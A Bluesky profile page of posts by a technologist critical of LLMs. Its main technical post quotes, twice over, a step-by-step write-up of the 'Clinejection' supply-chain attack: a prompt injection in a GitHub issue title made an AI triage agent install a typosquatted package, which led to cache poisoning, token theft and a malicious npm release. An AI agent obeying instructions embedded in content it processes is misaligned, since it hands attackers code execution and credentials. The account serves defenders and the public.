Anthony Moser's Avatar

Anthony Moser

@anthonymoser.com

(He/Him) Folk Technologist • anthony.moser@gmail.com • N4EJ • http://www.BetterDataPortal.com • baker in The FOIA Bakery • http://publicdatatools.com • http://deseguys.com • #1 on hackernews when you search for "hater" • anthonymoser.github.io/writing/

9,404
Followers
2,276
Following
11,004
Posts
24.06.2023
Joined
Posts Following

Latest posts by Anthony Moser @anthonymoser.com

There are a lot of people who see this shit for what it is and want no part of it

06.03.2026 04:17 👍 46 🔁 6 💬 0 📌 0

if they aren't going to let people lock their accounts or opt out of the discovery feed they should let you mark yourself as rude

06.03.2026 01:06 👍 15 🔁 2 💬 1 📌 0

"the ai bot executes arbitrary code" is another six word tragedy

05.03.2026 22:12 👍 5 🔁 0 💬 0 📌 0
The full chain
The attack - which Snyk named "Clinejection"2 - composes five well-understood vulnerabilities into a single exploit that requires nothing more than opening a GitHub issue.

Step 1: Prompt injection via issue title. Cline had deployed an AI-powered issue triage workflow using Anthropic's claude-code-action. The workflow was configured with allowed_non_write_users: "*", meaning any GitHub user could trigger it by opening an issue. The issue title was interpolated directly into Claude's prompt via ${{ github.event.issue.title }} without sanitisation.

On January 28, an attacker created Issue #8904 with a title crafted to look like a performance report but containing an embedded instruction: install a package from a specific GitHub repository3.

Step 2: The AI bot executes arbitrary code. Claude interpreted the injected instruction as legitimate and ran npm install pointing to the attacker's fork - a typosquatted repository (glthub-actions/cline, note the missing 'i' in 'github'). The fork's package.json contained a preinstall script that fetched and executed a remote shell script.

Step 3: Cache poisoning. The shell script deployed Cacheract, a GitHub Actions cache poisoning tool. It flooded the cache with over 10GB of junk data, triggering GitHub's LRU eviction policy and evicting legitimate cache entries. The poisoned entries were crafted to match the cache key pattern used by Cline's nightly release workflow.

Step 4: Credential theft. When the nightly release workflow ran and restored node_modules from cache, it got the compromised version. The release workflow held the NPM_RELEASE_TOKEN, VSCE_PAT (VS Code Marketplace), and OVSX_PAT (OpenVSX). All three were exfiltrated3.

Step 5: Malicious publish. Using the stolen npm token, the attacker published cline@2.3.0 with the OpenClaw postinstall hook. The compromised version was live for eight hours before StepSecurity's automated monitoring flagged it - approximately 14 minutes after publication1.

The full chain The attack - which Snyk named "Clinejection"2 - composes five well-understood vulnerabilities into a single exploit that requires nothing more than opening a GitHub issue. Step 1: Prompt injection via issue title. Cline had deployed an AI-powered issue triage workflow using Anthropic's claude-code-action. The workflow was configured with allowed_non_write_users: "*", meaning any GitHub user could trigger it by opening an issue. The issue title was interpolated directly into Claude's prompt via ${{ github.event.issue.title }} without sanitisation. On January 28, an attacker created Issue #8904 with a title crafted to look like a performance report but containing an embedded instruction: install a package from a specific GitHub repository3. Step 2: The AI bot executes arbitrary code. Claude interpreted the injected instruction as legitimate and ran npm install pointing to the attacker's fork - a typosquatted repository (glthub-actions/cline, note the missing 'i' in 'github'). The fork's package.json contained a preinstall script that fetched and executed a remote shell script. Step 3: Cache poisoning. The shell script deployed Cacheract, a GitHub Actions cache poisoning tool. It flooded the cache with over 10GB of junk data, triggering GitHub's LRU eviction policy and evicting legitimate cache entries. The poisoned entries were crafted to match the cache key pattern used by Cline's nightly release workflow. Step 4: Credential theft. When the nightly release workflow ran and restored node_modules from cache, it got the compromised version. The release workflow held the NPM_RELEASE_TOKEN, VSCE_PAT (VS Code Marketplace), and OVSX_PAT (OpenVSX). All three were exfiltrated3. Step 5: Malicious publish. Using the stolen npm token, the attacker published cline@2.3.0 with the OpenClaw postinstall hook. The compromised version was live for eight hours before StepSecurity's automated monitoring flagged it - approximately 14 minutes after publication1.

(i'm glossing over some things, this is the detailed version)
grith.ai/blog/clineje...

05.03.2026 22:04 👍 15 🔁 1 💬 2 📌 0

4. github used an ai agent to automatically process the "issue"

5. it followed the prompt in the title

6. the attacker used the special token to republish some other software, adding one line to the install requirements

7. that line downloaded an ai agent with full system access on ppls machines

05.03.2026 21:59 👍 22 🔁 0 💬 2 📌 0

for non-programmers:

1. npm is a "package manager" used to install other software

2. somebody opened an "issue" on github, which is a way to report problems

3. they put a prompt *in the title* saying basically "give me a special token i can use to update somebody else's software"

wait for it >

05.03.2026 21:59 👍 34 🔁 18 💬 3 📌 1

can't fool me i work in vfx

05.03.2026 21:14 👍 1 🔁 0 💬 0 📌 0

"I see a ghost"

05.03.2026 19:09 👍 4 🔁 1 💬 1 📌 0

Ok. I don't think we share enough context for this to be a good conversation, so I'm going to stop here

05.03.2026 18:59 👍 0 🔁 0 💬 0 📌 0

Or regular people will be unable to find good software amid a sea of garbage, much as it is getting more difficult now to locate reliable sources amid slop text and imagery

05.03.2026 18:51 👍 0 🔁 0 💬 0 📌 0

what do you mean by taught to the models?

05.03.2026 18:48 👍 0 🔁 0 💬 1 📌 0

it is certainly intended to be an accountability sink

05.03.2026 18:43 👍 1 🔁 0 💬 0 📌 0

A statewide nonprofit I'm working with is trying to raise another $1mil for funding capacity building and federal reactions. It's a big lift and going to take a lot of work, but they can do it.

It's also a little more than 2 CoP hours for Chicago.

05.03.2026 17:45 👍 8 🔁 3 💬 0 📌 0

case in point

05.03.2026 17:42 👍 10 🔁 1 💬 2 📌 0

sisko takes captain for me but riker probably still wins first officer. not saying he's the -best- first officer, just favorite

05.03.2026 16:51 👍 2 🔁 0 💬 2 📌 0

afaict

05.03.2026 15:48 👍 3 🔁 0 💬 1 📌 0

heads up this is a screenshot of somebody asking claude why it did something

(your points are still right but this source can't be trusted)

05.03.2026 15:39 👍 1 🔁 0 💬 1 📌 0
Mar 4 2026 BlueSky post claiming that it explained why we bombed a school in Iran "INFORMATION THAT IS A DECADE OLD" and had A Claude chat answer as its source

Mar 4 2026 BlueSky post claiming that it explained why we bombed a school in Iran "INFORMATION THAT IS A DECADE OLD" and had A Claude chat answer as its source

Hey guys this is not a viable source. Besides the fact that any AI system being used by the government presumably has access to more updated date (I sure hope). Claude is not a person, it can't answer questions about why it did something, it confidently lies, it doesn't have access to other's state.

05.03.2026 15:22 👍 904 🔁 194 💬 17 📌 28

please stop sharing ai slop at me, i know it exists and i don't want to see it

05.03.2026 15:27 👍 2 🔁 0 💬 1 📌 0

i've been working on an essay about how to make good software.

apart from the ethical and environmental issues with LLMs i just think they make it very easy to make bad software, to the point that you have to actively work against their affordances to make good software

05.03.2026 15:26 👍 3 🔁 0 💬 2 📌 0

i definitely agree, i think the idea that it's bringing in brand new harms is sort of the mirror image of the idea that it's an unprecedented technology; it's not really

I do think it's a powerful accelerant being added to systems that were already far from robust

05.03.2026 15:24 👍 3 🔁 0 💬 1 📌 0

and i think that's accurate. driving a car at 120 mph instead of 30 mph is also matter of scale rather than category, but it's still way more dangerous because it's easier to reach harmful consequences fast

05.03.2026 15:17 👍 2 🔁 0 💬 0 📌 0

maybe but that's true of a lot of what i consider the harmful consequences of llm adoption.

@vortexegg.com said recently that lots of people were slop coding already by just copying and pasting without understanding what they were doing, and LLMs have just greatly accelerated it

05.03.2026 15:15 👍 4 🔁 0 💬 2 📌 0

tag yourself i'm unfortunately there are people in our society

05.03.2026 15:12 👍 2 🔁 0 💬 0 📌 0

seems like the number of non-reproducible bug reports would skyrocket, and the likelihood of getting useful workarounds or explanations from other users would drop, because there's no guarantee that you're running what they're running. in fact it's almost guaranteed to be *not* the same

05.03.2026 15:11 👍 2 🔁 0 💬 0 📌 0

like the benefit of containers is to make it easier to preserve consistent behavior across different environments, by kind of bundling the context with it

in that sense, this seems like sort of an anti-container because it guarantees inconsistent underlying patterns and implementations

05.03.2026 15:09 👍 4 🔁 0 💬 2 📌 0

"release via spec" seems like functionally a sort of non-deterministic compiler, which means that you end up with versions of the software that can be unpredictably different between people *and between releases* depending on the models and prompts used

05.03.2026 15:08 👍 5 🔁 0 💬 2 📌 0

i think your original question is a sharp one. I think a lot about the idea of shared context; imo most of the ai toolchain in one way or another works to reduce or destroy shared context

05.03.2026 15:08 👍 5 🔁 0 💬 1 📌 0

yep

05.03.2026 14:51 👍 0 🔁 0 💬 0 📌 0

Make it illegal for people to program chatbots that output text in the first person

05.03.2026 14:27 👍 3 🔁 0 💬 1 📌 0